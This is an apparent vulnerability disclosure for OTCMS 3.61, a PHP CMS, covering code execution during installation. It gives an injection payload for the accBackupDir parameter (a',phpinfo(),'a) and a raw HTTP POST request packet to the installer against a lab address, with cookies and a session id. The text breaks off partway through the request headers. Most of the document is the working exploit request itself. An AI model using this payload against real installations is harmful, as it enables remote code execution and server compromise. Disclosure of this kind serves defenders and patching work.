OTCMS 3.61 Command Execution
OTCMS 3.61 Command Execution Description OTCMS 3.61 has caused code execution vulnerabilities during installation. Affected parameters: accBackupDir=a',phpinfo(),'a Request Packet: POST /OTCMS_PHP_V3.61_20180806/install/index.php?mudi=run HTTP/1.1 Host: 192.168.159.148 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.159.148/OTCMS_PHP_V3.61_20180806/install/index.php?mudi=config Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cookie: qshZy_userID=1; qshZy_username=ss123; qshZy_userInfo=AjsBD10hD39QMA9uWGoCDlNmUTRZZVY1UmIEMAcxCzgDMw44DDYBOlUxBWRbaAI1VzBQM1FrAGBRNFFkVGVROAJvATJdZg9uUGQPOFhsAjZTDFEPWQhWZlIvBDIHfgsw; qshZy_usercall=ssssss; PHPSESSID=mubrngtpmvp2dvpuaoe7pkfgb0 DNT: 1 Connection: close Upgr